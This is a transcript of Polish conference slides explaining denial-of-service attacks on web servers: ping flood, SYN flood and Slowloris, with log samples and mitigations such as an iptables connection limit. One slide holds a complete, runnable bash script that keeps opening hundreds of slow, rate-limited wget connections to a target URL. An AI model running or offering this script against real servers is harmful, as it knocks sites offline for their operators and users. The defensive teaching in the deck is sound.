Jak blada twarz psuje serwer HTTP? Kamil Porembiński thecamels.org

Transkrypt

1 Jak blada twarz psuje serwer HTTP? Kamil Porembiński thecamels.org

2 Ping flood Ping flood popularny sposób ataku na serwer internetowy polegający na przeciążeniu łącza pakietami ICMP generowanymi na przykład przez program ping. Przeprowadza się go za pomocą komputera posiadającego łącze o przepustowości większej niż przepustowość łącza atakowanej maszyny, lub za pomocą wielu niezależnych komputerów.

3 Ping flood ping -s PING ( ) 65507(65535) bytes of data bytes from : icmp_seq=1 ttl=64 time=12.0 ms bytes from : icmp_seq=2 ttl=64 time=11.8 ms bytes from : icmp_seq=3 ttl=64 time=11.7 ms bytes from : icmp_seq=4 ttl=64 time=12.7 ms bytes from : icmp_seq=5 ttl=64 time=12.5 ms bytes from : icmp_seq=6 ttl=64 time=11.9 ms bytes from : icmp_seq=7 ttl=64 time=11.8 ms bytes from : icmp_seq=8 ttl=64 time=11.7 ms ^C ping statistics packets transmitted, 8 received, 0% packet loss, time 7007ms rtt min/avg/max/mdev = /12.070/12.751/0.339 ms

4 SYN flood Atak polega na wysyłaniu dużej ilości pakietów z ustawioną w nagłówku flagą synchronizacji (SYN) i najczęściej ze sfałszowanym adresem IP nadawcy (IP spoofing). Pakiety TCP z ustawioną flagą SYN służą do informowania zdalnego komputera o chęci nawiązania z nim połączenia. Podczas takiego ataku serwer, który otrzymał pakiet z flagą SYN na port, który jest otwarty, odpowiada na każdy pakiet zgodnie z zasadami protokołu TCP wysyłając pakiet z ustawionymi flagami synchronizacji (SYN) i potwierdzenia (ACK) do komputera, który w tym wypadku nie istnieje, istnieje, ale nie zamierzał nawiązywać połączenia z atakowanym hostem lub jest to komputer atakowanego, który specjalnie nie odpowiada. Powoduje to przesyłanie dużych ilość danych i obciąża łącze sieciowe.

5 SYN flood

6 Slowloris HTTP DoS :ooooooooooccoocoocococoooooooo CCCCOO888888O888888Oo..o8Oo..cO88Oo: :..:..ccocccoocooccooccccooooocccc :co8oc..... :..:cccoooooccoooocccccooooccc ::cccc:::c: ::::c:cccco :...:cooc::cccccc: :::::ccoocc......::cccc:.::ccoocc: :::.:::::::ccco

7 Slowloris HTTP DoS Nie jest atakiem TCP DoS Analogiczny do ataku SYN Flood Pełne połączenie TCP Niepełne połączenie HTTP Minimalna przepustowość Kilkaset połączeń może zablokować serwer Przez długi czas nie zostawia śladów w logach Napisany w Perlu IO::Socket::INET IO::Socket::SSL GetOpt::Long

8 Slowloris HTTP DoS Podane na atak: Apache 1.x Apache 2.x dhttpd GoAhead WebServer Odporne na atak: IIS6.0 IIS7.0 lighttpd Squid nginx Cherokee Netscaler Cisco CSS

9 Slowloris HTTP DoS

10 Slowloris HTTP DoS [29/Jan/2010:20:09: ] "GET / HTTP/1.1" "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR ;.NET CLR l3;.NET CLR ;.NET CLR ; MSOffice 12)" [29/Jan/2010:20:09: ] "GET / HTTP/1.1" "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR ;.NET CLR l3;.NET CLR ;.NET CLR ; MSOffice 12)" [29/Jan/2010:20:09: ] "GET / HTTP/1.1" "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR ;.NET CLR l3;.NET CLR ;.NET CLR ; MSOffice 12)" [29/Jan/2010:20:09: ] "GET / HTTP/1.1" "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR ;.NET CLR l3;.NET CLR ;.NET CLR ; MSOffice 12)" [29/Jan/2010:20:09: ] "GET / HTTP/1.1" "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0;.NET CLR ;.NET CLR l3;.NET CLR ;.NET CLR ; MSOffice 12)" [29/Jan/2010:20:09: ] "GET / HTTP/1.1" "-" "Mozi

11 Slowloris HTTP DoS Zabezpieczenia: HAProxy Perlbal - mod_limitipconn iptables -I INPUT -p tcp --dport 80 --syn -m connlimit --connlimit-above 20 -j REJECT Jeśli czytasz to zdanie to musisz się wyjątkowo nudzić. W ramach rekompensaty zgłoś się do mnie a dostaniesz małą nagrodę ; )

12 Czy może być coś gorszego? Może :]

13 Bash + wget #!/bin/bash ua="mozilla/5.0 (X11; U; Linux x86_64; pl-pl; rv: ) Gecko/ Ubuntu/9.10 (karmic) Firefox/3.5.7" url=" while true; do for i in `seq 1 200`; do echo "Tworze polaczenie numer $i" wget -b -o /dev/null -O /dev/null -U $ua --limit-rate=1k $url done sleep 30 done

14 Bash + wget Należy zauważyć, że Wget realizuje to w ten sposób, że po stwierdzeniu, iż odczyt z sieci zabrał mniej czasu, niż wynika to z podanej prędkości, przez odpowiedni czas wstrzymuje się od działania (zasypia). Końcowym efektem takiej strategii jest spowolnienie transferu TCP mniej więcej do podanej prędkości. Niemniej jednak, na osiągnięcie tej równowagi potrzeba trochę czasu, więc nie bądźcie zaskoczeni, jeśli ograniczenie szybkości nie działa dla bardzo małych plików. Tak samo, strategia zasypiania nie zda egzaminu, jeśli poda się zbyt małe pasmo, dajmy na to mniejsze niż 1,5KB/s.

15 Hmm... czy są jakieś pytania? Właściwie to odpowiedzi szukaj gdzieś w Internecie.